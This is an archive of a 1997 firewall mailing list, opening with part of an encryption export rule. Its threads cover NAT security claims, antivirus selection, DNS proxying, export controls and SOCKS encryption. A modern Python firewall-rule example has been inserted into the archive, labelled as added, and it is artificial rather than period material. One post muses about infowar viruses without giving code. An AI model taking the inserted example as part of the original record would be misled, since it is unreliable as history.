[Docket No. 960918265-6296-02]
RIN 0694-AB09

Licensing of Key Escrow Encryption Equipment and Software

AGENCY: Bureau of Export Administration, Commerce.

ACTION: Interim final rule.

-----------------------------------------------------------------------

This interim final rule amends the Export Administration Regulations (EAR) by imposing national security controls on Key escrow information security (encryption) equipment and software transferred from the U.S. Munitions List to the Commerce Control List following a commodity jurisdiction determination by the Department of State. This interim final rule also amends the EAR to exclude key escrow items from the de minimis provisions for items exported from abroad and to exclude key escrow encryption software from mass market eligibility. Further, key escrow encryption software is subject to the EAR even when made publicly available.

DATES: Effective date. This rule is effective December 13, 1996.

Comment date: Comments should be submitted on or before January 13, 1997.
ADDRESSES: Written comments should be sent to Nancy Crowe, Regulatory Policy Division, Office of Exporter Services, Bureau of Export Administration, Room 2705, 14th Street and Pennsylvania Avenue, N.W., Washington, D.C. 20230.

--------------------------------------------------------------------------

Suerte,
_Vin

Vin McLellan + The Privacy Guild + 53 Nichols St., Chelsea, MA 02150 USA <617> 884-5548

From firewalls-owner Fri Jan 3 01:29:42 1997
From: Russ
To: "'Mark Joseph Edwards'"
Cc: "'Firewalls Mailing List'"
Subject: RE: NT NAT
Date: Fri, 3 Jan 1997 03:56:45 -0500

They made the statement I quoted, I didn't. I quoted it precisely from their web page, and then added my commentary. What do you think they were trying to say when they said it "protects your internal IP servers and workstations from Internet hackers", if not that it COMPLETELY protects them? How difficult would it have been to say that it "adds protection..."? Which still would have been WRONG, WRONG, WRONG.

Not only do they make that statement, but on the same page as that statement (http://www.on.com/ipfunnel/ogipfeat.htm) they have a network diagram that shows the On Guard IP Funnel as the only device between the internal network and the router connecting to the Internet. That's their diagram bud.
They don't show any Firewall anywhere in sight. So I see no reason why my message is unfair in any way, shape, or form.

As for my comment about Microsoft, I said REJECTED Microsoft marketeers, you know, the ones that Microsoft wouldn't want working there because they're too free with their words. This isn't a flame against Microsoft, duh.

You got anything intelligent to say on just why you think NAT offers ANY SECURITY AT ALL??? I can't wait to hear it. I mean ANY SECURITY AT ALL. Let me say it again so there's no misunderstanding; TELL ME WHAT SECURITY IP FUNNEL (with the features listed) PROVIDES TO A NETWORK EXPOSED TO THE INTERNET WITH NOTHING ELSE BUT A ROUTER BETWEEN THEIR TRUSTED MACHINES AND THE WILD BLUE YONDER AS SHOWN IN THE IP FUNNEL NETWORK DIAGRAM.

Russ
R.C. Consulting, Inc. - NT/Internet Security Consulting

From firewalls-owner Fri Jan 3 02:28:55 1997
Message-Id: <1.5.4.32.19970103091312.00904024@laus.dbk.laus.hr>
Date: Fri, 03 Jan 1997 11:13:12 +0200
To: firewalls@greatcircle.com
From: Mario Misic
Subject: sendmail 8.8.4 with firewall

Hi !

I am running sendmail-8.8.4 on AIX-3.2.5. My problem is how to configure sendmail-8.8.4 to send mail over my firewall server ! I configure sendmail.cf like they said in README file but .......... ?

Thanks.
http://www.laus.hr/
M.M

From firewalls-owner Fri Jan 3 05:18:30 1997
Message-Id: <199701031310.FAA18295@miles.greatcircle.com>
From: "Jamie Thain"
To: "Russ" ,
Cc: "'info@on.com'"
Subject: Re: NT NAT
Date: Fri, 3 Jan 1997 09:06:48 -0400

Russ,

>> .Protects your internal IP servers and workstations from Internet hackers

Well a NAT is one of the tools. Hey some people put up a single layer "high quality" firewall that offers protection, aka-> network-1, on-guard, firewall/plus and feel they are protected. Most of these vendors make the same claim. And if you had a single connectionless ip port, it would offer a lot of protection from getting in...

regards:jamie

From firewalls-owner Fri Jan 3 05:44:46 1997
Message-Id: <9701031340.AA14759@ops.wfc.com>
From: "Bill DeGan"
Organization: Walker Financial Corp.
To: firewalls@greatcircle.com
Date: Fri, 3 Jan 1997 08:33:11 300
Subject: Virus Scan Software
Reply-To: bill2@ops.wfc.com

Not sure if this is a proper question for this group, but here goes.

We are evaluating virus scan software to be installed on individual PC's and would welcome recommendations. We have folks that like McAfee and Norton but have no solid way to compare. Any help would be appreciated.

Bill DeGan
Walker Financial Corp.

From firewalls-owner Fri Jan 3 06:23:17 1997
Message-Id: <199701031425.JAA11930@boca.dsmith.nai.net>
From: "David T. Smith"
To: Firewalls@greatcircle.com
Subject: Re: DNS Proxy and Internal Root Name Server
In-reply-to: Your message of "Thu, 02 Jan 1997 16:21:44 PST." <32CC5118.5FB8@csc.com>
Date: Fri, 03 Jan 1997 09:25:21 -0500

In message <32CC5118.5FB8@csc.com>, Adam Safier writes:
>I'm missing something in this DNS discussion. Don't make the internal
>"root" a root, make it your "main" DNS server with a limited cache
>file. You set the "main" internal DNS server to act as a recursive
>resolver for all internal DNS servers.

Here's the problem: BIND does forwarder lookups before doing cache lookups.
Therefore, unless the "main" internal DNS server is also a secondary for ALL internal zones, the internal zones will be sent to the external resolver for resolution.

With some firewalls, the external resolver can be configured as a 'hidden' secondary of the internal top level domain and thus provide recursive resolution. However, that exposes the internal domain to the Internet (albeit only to a knowledgeable invader) and may not be appropriate for some companies. In addition, with firewalls that provide automatic split DNS services, that option may not be available since they would not make the internal network accessible from the external firewall.

We are looking at a solution similar to the one posted earlier where the order of resolution is changed in the BIND code: instead of resolution being performed in the order 1) authoritative, 2) forwarded and 3) cached, we believe that it may be useful to perform it in the order 1) authoritative, 2) cached, and 3) forwarded in the case of firewalled environments.

David Smith
--
//==========================================================\\
||David T. Smith                 | Specialists in           ||
||Tucker Network Technologies    | Network Computing        ||
||50 Washington St., PO 429      | --------------------     ||
||South Norwalk, CT 06856        | dsmith@tuckernet.com     ||
\\==========================================================//

From firewalls-owner Fri Jan 3 07:49:25 1997
From: harley@icrf.icnet.uk
Message-Id: <199701031521.HAA26556@miles.greatcircle.com>
Subject: re: Virus Scan Software
To: firewalls@greatcircle.com
Date: Fri, 3 Jan 1997 15:20:35 +0000 (GMT)

> Not sure if this is a proper question for this group, but here goes.

It probably isn't, except in so far as it's always worth reiterating that there's more security mileage in protecting the desktop -at- the desktop than in relying solely on viruswalls and firewalls which attempt to include filtering for viruses. ;-) I'm enclosing some info, and I'm always happy to discuss further by e-mail.

> We are evaluating virus scan software to be installed on individual
> PC's and would welcome recommendations.

Asking a firewalls list for recommendations in this case is asking your butcher's advice on buying fish. He -may- be well-qualified to advise you: OTOH he may know nothing about fish, he may regard fish as beneath him, and he may feel compelled as a catering professional to pretend he knows more about fish than he really does.
B-) Not everyone on this list is a firewalls expert or security guru: those who do fall into one of these categories aren't necessarily up to speed on PCs or viruses. In fact, virus mythology is as rife among security professionals as it is everywhere else. You may get responses that reflect what's in use at sites with representatives here, but that's not the same as recommendations for best practice.

> We have folks that like
> McAfee and Norton but have no solid way to compare.

As you obviously appreciate, liking the interface of a particular product is a poor basis for virus control. In this area, a nice interface may come a long way behind other criteria such as detection rate, tendency to false alarm, ease of distribution and administration, and other issues of which this isn't the best forum for discussion. McAfee has most of the market share and Symantec/Norton have a great deal of what's left, but neither package is necessarily the highest-rated among professionals.

> Any help would be
> appreciated.

Some pointers from the alt.comp.virus FAQ are included below.

--------------------include---------------------

There used to be a comprehensive set of product reviews at:
http://www.first.org/virus/virrevws/
but the page is being reorganized and it may have disappeared altogether.

A number of reputable vendors include comparative reviews, papers on testing etc. on their WWW/FTP servers: try
http://www.datafellows.com/
http://www.drsolomon.com/
among others.

Virus Bulletin comparative reviews are available from
http://www.virusbtn.com/Comparatives/
and information is also available on their testing protocols.

Product reviews and other kewl stuff from Robert Slade:
telnet://freenet.victoria.bc.ca
login as guest, give the command "go virus"

For a list of scanners that have received the "NCSA Approved" rating of the National Computer Security Association in the U.S.A. see
http://www.ncsa.com/avpdcert.html
The page also explains the certification procedure.
----------------------outclude--------------------------

NCSA certification for AV products isn't a bad idea in principle, but hasn't always been well-implemented, and is subject to some of the same misgivings voiced here about firewall certification. However, it's probably more use than asking your neighbour what he uses. B-)

Secure Computing have an alternative certification scheme in progress, and the January issue includes a 'bumper Anti-Virus review'. (US/Canada subscriptions 100016.2432@compuserve.com). Possibly the best reviews are those done by Virus Bulletin, though. (www.virusbtn.com).

You might also like to check out the Virus Research Unit site at Tampere:
http://www.uta.fi/laitokset/virus/

The alt.comp.virus FAQ and some other relevant documents (including the Virus-L FAQ) are available from the web page in my signature.

--
David Harley                     \ | /    alt.comp.virus FAQ
D.Harley@icrf.icnet.uk            \ | /    & Anti-Virus Web Page
Support & Security Analyst         \ | /    Folk London On-Line gig-list
Imperial Cancer Research Fund  ____\|/____  http://webworlds.co.uk/dharley/

From firewalls-owner Fri Jan 3 08:01:16 1997
Message-Id: <199701031531.HAA18320@geocities.com>
From: "Gabriel Dura"
Subject: Air Force Web Site Hacked - Reply
Date: Fri, 3 Jan 1997 17:31:58 +0200

Read only media might be a solution but it is not a practical one for web sites which change their content very often. I have the following questions related to this subject:

- What if the OS is using a RAM disk?
- Isn't it possible to start a process that can alter the web file information while it is sent (only words for example)?

I am not a firewall guru but I wonder if it wouldn't be possible to use a second computer as mirror of the Web Site. This computer can supervise the original web site and monitor the audit log using remote access. In case it detects major modifications in the original web site or other kind of unauthorized access it can make the following operations:

- make a copy of the altered site for later analysis
- kill any processes which start writing, or attempting to write in areas they shouldn't (system areas for instance)
- save the current system parameters for later analysis
- replace the altered site with the good one
- change sensitive passwords and save them for the administrator if possible
- alert the administrator

I think a system like that can prevent hacking without anyone from the outside observing anything. If the above ideas are not correct please let me know.
Just a thought

Gabriel Dura
dura@geocities.com

From firewalls-owner Fri Jan 3 08:13:04 1997
From: peter@baileynm.com (Peter da Silva)
Message-Id: <9701031536.AA13744@sonic.nmti.com.nmti.com>
Subject: Re: The Looong Reach of US Crypto-Export Controls
To: relay1.shore.net@shore.net (Vin McLellan)
Date: Fri, 3 Jan 1997 09:36:16 -0600 (CST)
Cc: firewalls@greatcircle.com
In-Reply-To: from "Vin McLellan" at Jan 3, 97 03:22:17 am

Yow!

> c.3. ``Software'' designed or modified to protect against malicious
> computer damage, e.g., viruses;

Technically this means that a copy of "login" that uses a plaintext password file with no encryption qualifies as a munition, because the purpose of access control is to protect against malicious computer damage. This makes Windows NT and any version of UNIX illegal to export as well, because both have access control and multiuser protection built in.

> a. ``Software'' required for the ``use'' of equipment excluded
> from control under the Note to 5A002.

You can always run Windows 3.1 on your laptop, right? Or if this isn't enough, embed the encryption as an inherent part of the O/S and bypass ITAR completely.
> b. ``Software'' providing any of the functions of equipment
> excluded from control under the Note to 5A002.

What equipment is this?

From firewalls-owner Fri Jan 3 08:50:16 1997
Message-Id: <199701031625.IAA29036@miles.greatcircle.com>
Date: Fri, 03 Jan 1997 11:24:28 EST
From: "John Silltow, Sys Security (GBWBSDHS) X5095 SILLTOJ - WEBS"
To: firewalls@greatcircle.com
Subject: RE: VIRUS SCAN SOFTWARE

Responding to Bill DeGan:

Although the type and frequency of viruses can be different in countries around the world, in the UK we have a publication called Virus Bulletin which regularly reviews virus scanners and does comparisons. In addition, the magazine Secure Computing has just undertaken a comparative review. In general, the 100 per cent hit rates are achieved by Dr. Solomons, Data Fellows F-Prot and Command F-Prot. Sophos Sweep, Thunderbytes and McAfee tend to come in around 99 per cent.

We use a 'sheepdip' machine with Dr. Solomon's and Sophos on it for all diskettes coming into the organisation. Once checked the diskettes are given an authorisation code by Disknet. Individual machines have Dr. Solomon's running as a scanner and in memory. Gradually they are all getting the Disknet software as well and at that time they are unable to accept a diskette which has not been through the authorisation process (i.e. scanned).
The individual machines are also set up so that they cannot originally authenticate any diskette unless they conduct a low-level format on it first. This slows down software and data theft as a bonus.

Hope this helps. Come back to me if you need more.

John Silltow
gbwbsdhs@ibmmail.com

From: "Bill DeGan"
To: firewalls@greatcircle.com
Date: Fri, 3 Jan 1997 08:33:11 300
Subject: Virus Scan Software

Not sure if this is a proper question for this group, but here goes. We are evaluating virus scan software to be installed on individual PC's and would welcome recommendations. We have folks that like McAfee and Norton but have no solid way to compare. Any help would be appreciated.

Bill DeGan
Walker Financial Corp.

From firewalls-owner Fri Jan 3 09:37:03 1997
Date: Fri, 3 Jan 1997 17:43:09 +0100 (MET)
From: Carl Karlsson
To: "'Firewalls Mailing List'"
Subject: RE: NT NAT
In-Reply-To: <41FDA823FC5AD011A0970000E8D5C66771A6@mail.rc.on.ca>

On Fri, 3 Jan 1997, Russ wrote:
> You got anything intelligent to say on just why you think NAT offers ANY
> SECURITY AT ALL??? I can't wait to hear it. I mean ANY SECURITY AT ALL.
I'd like to know if and why this means that masquerading one's network behind a 'secured' host doesn't provide any added security from just connecting the network straight out? Or am I missing something here (not unusual :)?

I was under the impression that if I use some box (Linux with TIS fwtk for example, or that NT box perhaps?) masquerading my network and using 192.168.x.x-addresses inside, I would be at least a little bit more secure than if I had all my w95/nt/unix machines directly connected to the internet?

(Not talking super-secure here, not flaming anyone, but just interested! Pointers do nicely if this is already well-known...)

Calle

From firewalls-owner Fri Jan 3 10:07:58 1997
Message-Id: <32CD3702.58E@exphub.pmh.org>
Date: Fri, 03 Jan 1997 10:42:42 -0600
From: "Cary Conover(IS) 13897"
Organization: Parkland Memorial Hospital
To: Mario Misic
Cc: firewalls@greatcircle.com
Subject: Re: sendmail 8.8.4 with firewall
References: <1.5.4.32.19970103091312.00904024@laus.dbk.laus.hr>

Mario Misic wrote:
>
> Hi !
>
> I am running sendmail-8.8.4 on AIX-3.2.5.
>
> My problem is how to configure sendmail-8.8.4 to send mail over my firewall
> server !
> I configure sendmail.cf like they said in README file but .......... ?
>
> Thanks.
>
> http://www.laus.hr/
>
> M.M

You need to get with the network administrator and find out which one of your network servers is the Mail Handler and if it is noted as such in the DNS. If it is then the sendmail should use this to send the mail to the firewall first and then the firewall forwards it on to the outside world. I would assume that the Firewall would be listed as an MX in the DNS as well. I am not sure on this one. I know I will get corrected if I am wrong.

--
Cary D. Conover
AIX Systems Administrator
Senior Systems Analyst
Parkland Memorial Hospital
Dallas, Texas
cconov@parknet.pmh.org
carydc@why.net
817-571-6694 Home Voice
817-571-6793 Data/Fax
817-360-8572 Mobile
214-590-0244 Work Voice
214-786-0282 Pager

From firewalls-owner Fri Jan 3 10:13:15 1997
Message-Id: <199701031655.IAA07294@notesgw2.sybase.com>
To: Lawrence Ting
Cc: firewalls
From: Ryan Russell/SYBASE
Date: 3 Jan 97 8:52:36 EDT
Subject: Re: Any Recommendations?
Firewall-1 will proxy when it needs to authenticate users going out (i.e. pop up a web page asking for username and password before it lets you out.) But, as a general purpose proxy (logging URLs, filtering content, caching, etc..) I believe it would make a poor choice. I don't know this from personal experience, having only used it in the stateful-packet-filter mode, but from the docs I've looked at, I don't think I'm incorrect.

Ryan

---------- Previous Message ----------
To: firewalls
cc:
From: lawrenceting @ www.uob.com.sg (Lawrence Ting) @ smtp
Date: 01/03/97 01:29:59 PM
Subject: Any Recommendations?

Good day,

I'm in the midst of evaluating BlackHole, Gauntlet and Firewall-1 as a proxy-based firewall, while evaluating Sunscreen, CISCO PIX and Proteon GTX Secure as an IP-less packet-filtering firewall. Firewall-1 seemed more like a packet-filtering firewall while I have a hard time to distinguish a better choice between Blackhole and Gauntlet. As for Sunscreen, it is a definitely more expensive choice than the other two. Can someone pls do kindly share your expertise or comments or experience on the abv mentioned products in terms of their functionalities?

Thanks in adv.

Lawrence TING
Network Security Officer

From firewalls-owner Fri Jan 3 10:50:13 1997
From: Chip Rosenthal
Message-Id: <199701031803.MAA24783@garcon.unicom.com>
Subject: Re: internal filtering router - filter config?
To: Firewalls@GreatCircle.COM
Date: Fri, 3 Jan 1997 12:03:19 -0600 (CST)
Cc: makoski@future.dreamscape.com
In-Reply-To: <199701030900.BAA03967@miles.greatcircle.com> from "Firewalls-Digest" at Jan 03, 1997 01:00:39 AM

> From: Steve Matkoski
> Subject: internal filtering router - filter config?
>
> What type of things would you filter on the internal router? or even
> the external router? I am going to be installing a firewall real soon
> and would really appreciate any help.

Unless I misunderstand, I think you ought to be asking what should be *allowed* rather than what should be filtered. Most people here would advocate a "deny unless specifically permitted" stance in your filter rules.

If you don't already have a firewall book, the Chapman & Zwicky book does a pretty good job on this stuff. They give a lot of attention to configuring the filter on a service-by-service basis.

--
Chip Rosenthal * Unicom Systems Development * URL: http://www.unicom.com/ * 4868D8BE10C86BDE 6017000BA783998E
Helmet good. Law bad.
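The two stances in the reply above, as an added example that is not code from the post or from the Chapman & Zwicky book: a "filter the known-bad" rule set with a permit default beside a service-by-service "permit the needed" rule set with a deny default, both evaluated over the same constructed packets. The internal network, the bastion host, the outside address and the service list are all assumptions made for the example.

```python
"""Default-permit 'filter the bad' vs. default-deny 'permit the needed'.

Added example, not code from the list post or from the Chapman & Zwicky
book. The internal network, bastion host and service list are constructed
placeholders; first matching rule wins, as on most filtering routers.
"""
from dataclasses import dataclass
from ipaddress import IPv4Network, ip_address, ip_network
from typing import Optional

INTERNAL = ip_network("192.168.1.0/24")  # constructed internal network
ANY = ip_network("0.0.0.0/0")
BASTION = ip_network("192.168.1.10/32")  # constructed mail/DNS/web host


@dataclass(frozen=True)
class Packet:
    src: str
    dst: str
    proto: str            # "tcp", "udp" or "icmp"
    dport: Optional[int]  # destination port, None for icmp
    ack: bool = False     # TCP ACK set: not the opening packet of a connection


@dataclass(frozen=True)
class Rule:
    action: str                         # "permit" or "deny"
    src: IPv4Network
    dst: IPv4Network
    proto: str = "any"
    dport: Optional[int] = None         # None matches every port
    established: Optional[bool] = None  # None: don't care; True: ACK must be set
    note: str = ""

    def matches(self, p: Packet) -> bool:
        return (ip_address(p.src) in self.src
                and ip_address(p.dst) in self.dst
                and self.proto in ("any", p.proto)
                and self.dport in (None, p.dport)
                and self.established in (None, p.ack))


def evaluate(rules, packet, default):
    """Return (action, note); note is 'default' when no rule matched."""
    for rule in rules:
        if rule.matches(packet):
            return rule.action, rule.note
    return default, "default"


# Stance 1: enumerate what you know is bad, let everything else through.
DENY_LIST = [
    Rule("deny", ANY, INTERNAL, "tcp", 23, note="no telnet from outside"),
    Rule("deny", ANY, INTERNAL, "udp", 2049, note="no NFS from outside"),
]

# Stance 2: enumerate the services that must work, deny everything else.
PERMIT_LIST = [
    Rule("permit", ANY, BASTION, "tcp", 25, note="SMTP to the bastion only"),
    Rule("permit", ANY, BASTION, "udp", 53, note="DNS to the bastion only"),
    Rule("permit", ANY, BASTION, "tcp", 80, note="HTTP to the bastion only"),
    Rule("permit", ANY, INTERNAL, "tcp", established=True,
         note="replies to connections opened from inside"),
]


def compare(packet: Packet):
    """Verdict of each stance on the same packet: (deny-list, permit-list)."""
    return (evaluate(DENY_LIST, packet, "permit")[0],
            evaluate(PERMIT_LIST, packet, "deny")[0])


def permitted_only_by_default(rules, default, probes):
    """Probes that get through without any rule having spoken for them.

    Under a permit default this is the set of exposures nobody chose;
    under a deny default it is always empty, which is the point of the stance.
    """
    return [p for p in probes
            if evaluate(rules, p, default) == ("permit", "default")]


# Constructed probe traffic from an outside address (203.0.113.7 is in a
# documentation range) toward the internal network.
PROBES = [
    Packet("203.0.113.7", "192.168.1.10", "tcp", 25),              # inbound mail
    Packet("203.0.113.7", "192.168.1.42", "tcp", 23),              # telnet to a desktop
    Packet("203.0.113.7", "192.168.1.42", "tcp", 139),             # NetBIOS, never listed
    Packet("203.0.113.7", "192.168.1.42", "tcp", 25),              # SMTP straight to a desktop
    Packet("203.0.113.7", "192.168.1.42", "tcp", 4321, ack=True),  # reply to an inside client
]

if __name__ == "__main__":
    for p in PROBES:
        print(f"{p.dst}:{p.dport:<5} ack={p.ack!s:<5} deny-list/permit-list = {compare(p)}")
    print("reachable only by default:",
          [(p.dst, p.dport) for p in permitted_only_by_default(DENY_LIST, "permit", PROBES)])
```

Under the deny-list, four of the five probes reach the inside purely because nothing mentioned them; under the permit-list every permitted packet can be traced to a rule someone wrote for a named service.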
From firewalls-owner Fri Jan 3 10:56:22 1997
From: "Stout, Bill"
To: "'Firewall List'"
Subject: RE: The Looong Reach of US Crypto-Export Controls
Date: Fri, 3 Jan 1997 10:18:32 -0800

On Friday, January 03, 1997 12:22 AM, Vin McLellan[SMTP:relay1.shore.net@shore.net] wrote:
> I earlier posted a message which quoted a well-informed Netizen who
> claimed that the new US Federal ERA regs (which transfer control of many
> encryption exports from the U.S. Dept. of State to the U.S. Commerce Dept)
> now explicitly forbid the unlicensed export of software "designed or
> modified to protect against malicious computer damage, e.g., viruses"
> (c.3., below)
>
> Tell the truth, I couldn't quite believe they had done it! (A
> whole new _class_ of export controls? Over very basic computer security
> tech, so vaguely described? Tucked into the fine print of a
> regulatory rewrite which the Administration has widely touted as a
> "compromise" with market-hungry US Industry and concerned compsec
> professionals!?!
> And with the DC rumor mill full of claims that the
> heavy-handed ERA language reflected the FBI's ambitions for a domestic GAK
> bill, not the NSA/DoD's spooky Infowar concerns.)

In an infowar environment, where Army Generals state they worry about 'Getting their butts kicked by long-haired hackers' (Not exact quote), creating and sending computer viruses to disable a country's PCs, Servers, Routers, and other equipment is an important attack, (against either state or industrial targets) and most useful these days in a U.S. defined non-'real' war LIC (Low Intensity Conflict) such as Honduras (anyone remember?), Ethiopia, Bosnia, and against a U.S. Domestic group involved in an activity the Feds have proclaimed today's Politically correct 'War' on (Drugs/Guns/Bombs/Encryption/Domestic Violence/Wire fraud/[insert propaganda campaign here]). Any effort to inoculate foreign equipment would make infowar that much more difficult.

Creating a trojaned virus that internally launched SYN, POD (ping of death), boot sector corruption, and other system disabling or morale degrading event is much more cost effective than launching one or more Multi-million dollar cruise missile per telephone closet. Plus you can't just launch cruise missiles during a LIC, plus the U.S. usually ends up paying to rebuild what they blow up.

Rumours in the past accused our government of accidental release of biological viruses to the public, and feds are now reviewing previously denied friendly troop exposure to Iraqi NBC (Nuclear/Biological/Chemical) weapons and defoliant 'Agent orange' used in the Vietnam LIC.
In order to prevent becoming a bystander casualty in some infowar action which is either announced on CNN or not, we need to do our best to protect our own systems against not just lamer and elite hackers who rarely do intentional damage, but against friendly accidents, direct state attacks, mercenary (paid malicious hackers), and violent activist groups (ACT-UP, Environmental, Marxist, Anti-Abortionists, Nazi, Radical Militia, the ATF/FBI/IRS-Secret Service, etc).

Sorry for the verbosity.

Bill

From firewalls-owner Fri Jan 3 10:56:35 1997
Date: Fri, 3 Jan 1997 09:20:31 -0800
Message-Id: <199701031720.JAA21665@newman>
From: "William M. Perry"
To: Denis Vella
cc: firewalls@greatcircle.com
Subject: Re: Securing a LAN
Reply-to: wmperry@aventail.com

>I'm not sure if this is the right place for this question..... Does anyone
>have any info on how to secure traffic ( maybe encrypt ) between, say, a
>Windows Client and a Unix Server over an internal LAN while maintaining
>compatibility with existing applications?

This is definitely the right place to ask. You can currently do this with a SOCKS server and an auto-socksifier like AutoSOCKS [1] or SocksCap [2] for windows. I'll concentrate on AutoSOCKS because I know it better (of course).

AutoSOCKS & SocksCap both automatically socksify an existing application. With AutoSOCKS, you run it once at login, and it socksifies any application from then onward.
With SocksCap, you launch each application through it - same effect, just less transparent to the user. With SOCKS v5, you can strongly authenticate or encrypt using a variety of methods. If you are using the aventail products, you have a few more choices. With publicly available code from NEC you can use Username/Password authentication, and control on a per-user basis who gets access to what. For server-to-server communication, you can use Kerberos via the GSS API - currently this is not available on the windows client side though. We have plugins for different authentication/encryption mechanisms as well, including CHAP to avoid sending your password in the clear on each connection, and the upcoming VPN server beta will support SSL. You can find the specifications for CHAP and (soon) SSL in your nearest internet-drafts repository (look for *marcvh*), or on the aventail web site [3]. -Bill P. 1 - http://www.aventail.com/ 2 - http://www.socks.nec.com/ 3 - http://www.aventail.com/educate/security.html From firewalls-owner Fri Jan 3 12:02:39 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA15602 for firewalls-outgoing; Fri, 3 Jan 1997 11:00:23 -0800 (PST) Received: from loach.cichlid.com (loach.cichlid.com [165.227.20.2]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id KAA15391 for ; Fri, 3 Jan 1997 10:59:23 -0800 (PST) Received: (from news@localhost) by loach.cichlid.com (8.7.4/8.7.3) id KAA15825; Fri, 3 Jan 1997 10:55:31 -0800 To: firewalls@GreatCircle.COM Path: cichlid From: david.bolger@entropy.ie Newsgroups: mail.firewalls Subject: None Date: 3 Jan 1997 10:55:29 -0800 Lines: 75 Message-ID: <5ajkn1$3v7@cichlid.cichlid.com> NNTP-Posting-Host: cichlid.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Message-ID: <3a94b87696c81a61@deliver.cichlid.com> Lines: 65 Xdeliver: processed on Fri Jan 3 10:55:20 PST 1997 Xdeliver: SENDER owner-fw-1-mailinglist@us.checkpoint.com Xdeliver: to Xdeliver: cc 
Xdeliver: apparent_to Xdeliver: from david.bolger@entropy.ie X400-Received: by mta EntropyMHS in /PRMD=Entropy/ADMD=ENT/C=ie; Relayed; 03 Jan 97 17:07:07 +0000 X400-Received: by /PRMD=Entropy/ADMD=ENT/C=ie; Relayed; 03 Jan 97 17:07:07 +0000 Date: 03 Jan 97 17:07:09 +0000 Delivery-Date: 03 Jan 97 17:07:09 +0000 Message-Type: Multiple Part X400-Originator: David.D.B.Bolger@x400.entropy.ie X400-MTS-Identifier: [/PRMD=Entropy/ADMD=ENT/C=ie;ISOCOR-32a9d5a9-entropymhs] X400-Recipients: owner-fw-1-mailinglist@us.checkpoint.com X400-Recipients: fw-1-mailinglist@us.checkpoint.com X400-Recipients: andy@hpsx1.indo.hp.com Original-Encoded-Information-Types: IA5-Text X400-Content-Type: P2-1984 Message-ID: Importance: normal Subject: RE: user authentication on FW-1 2.1 Autoforwarded: FALSE To: owner-fw-1-mailinglist@us.checkpoint.com (Non Receipt Notification Requested) To: fw-1-mailinglist@us.checkpoint.com (Non Receipt Notification Requested) CC: andy@hpsx1.indo.hp.com (Non Receipt Notification Requested) In-Reply-To: <0103084952-user authentication on FW-1 2.1* @MHS> Conversion: Allowed Conversion-With-Loss: Allowed Alternate-Recipient: Prohibited Content-Identifier: RE: user authen Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7Bit Sender: owner-fw-1-mailinglist@us.checkpoint.com Precedence: bulk
Hi folks, I've been having the same problems with FW-1 ver 2.1c on NT ver 3.51. Everything works fine except for User or Client Authentication, with same errors. Internal and OSPassword were turned on in the Object FireWall, and everything else looks fine. However it isn't working. I've got it to work on a test box once, but when I made other changes, it no longer works. I've also got it to work on a version 2.1a, but it's flaky. If anybody can shed some light, I'd appreciate it, regards, dave ---- owner-fw-1-mailinglist(a)us.checkpoint.com's Message ---- Hello everybody. I have some problems with FW-1 2.1 user authentication or client authentication.
I've installed the FW-1 2.1 without any problems on Windows NT 3.51 and HP9000/712 running HP-UX 10.01, except for the user and client authentications. Several user auth methods have been tried, e.g. using Internal FW-1 password or the OS password but none worked. I've always got the following error message: ".... does not support Internal password" or ".... does not support Unix password". Has anybody experienced this kind of problem before? Or did I miss something here? Any hints would be highly appreciated. Thanks a lot in advance for the help. Best regards Heri
From firewalls-owner Fri Jan 3 12:48:27 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA17568 for firewalls-outgoing; Fri, 3 Jan 1997 11:24:28 -0800 (PST) Received: from ns1.ntshop.com ([207.91.166.2]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id LAA17513 for ; Fri, 3 Jan 1997 11:24:03 -0800 (PST) Received: from beast.ntshop.net ([207.91.166.3]) by ns1.ntshop.com (post.office MTA v2.0 0813 ID# 153-13296) with SMTP id AAA91 for ; Fri, 3 Jan 1997 13:24:15 -0600 Received: by beast.ntshop.net with Microsoft Mail id <01BBF979.4FDC0940@beast.ntshop.net>; Fri, 3 Jan 1997 13:23:30 -0600 Message-ID: <01BBF979.4FDC0940@beast.ntshop.net> From: Mark Joseph Edwards To: "'firewalls@greatcircle.com'" Subject: RE: NT NAT Date: Fri, 3 Jan 1997 13:23:29 -0600 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable Sender: firewalls-owner@GreatCircle.COM Precedence: bulk
Russ wrote - ----------------------- [snip] You got anything intelligent to say on just why you think NAT offers ANY SECURITY AT ALL??? I can't wait to hear it. I mean ANY SECURITY AT ALL.
Let me say it again so there's no misunderstanding; TELL ME WHAT SECURITY IP FUNNEL (with the features listed) PROVIDES TO A NETWORK EXPOSED TO THE INTERNET WITH NOTHING ELSE BUT A ROUTER BETWEEN THEIR TRUSTED MACHINES AND THE WILD BLUE YONDER AS SHOWN IN THE IP FUNNEL NETWORK DIAGRAM. [snip] ----------------------- Russ, my post wasn't about the validity of a NAT for use in security implementations. You missed my point entirely. Let me clarify a bit -- since you're interpreting what you see on their site in your own unique way, you seem to have overlooked one important thing: THEY HAVE A FIREWALL PRODUCT FOR SALE TOO. DO YOU THINK THEY'D BE SO BLATANT AS TO IMPLY THAT THEIR NAT IS ALL YOU NEED WHEN THEY HAVE A MISSING PIECE OF THE SECURITY PUZZLE FOR SALE ON THE SAME WEB SITE? The picture you flamed them over is obviously intended by them to show how the product fits into network topology -- not to show how to secure a network entirely. Now we'll all go through 10,000 posts debating the NAT. Great. I can't wait....
